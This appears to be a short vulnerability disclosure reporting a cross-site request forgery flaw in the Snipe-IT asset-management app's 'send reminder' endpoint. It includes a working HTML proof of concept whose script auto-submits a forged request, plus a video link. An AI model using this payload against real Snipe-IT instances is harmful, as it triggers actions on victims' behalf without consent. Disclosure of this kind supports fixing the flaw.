Description
CSRF in Send Reminder
Proof of Concept
1 .Attacker sent form fake to victim
<html>
<body>
<form action="https://demo.snipeitapp.com/reports/unaccepted_assets/4/sent_reminder">
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
2 .Victim click, execute send reminder unexpected
Video Poc
https://drive.google.com/file/d/1ei_bfxIbACA6DWObg2bjZjJBiqTPlwWd/view?usp=sharing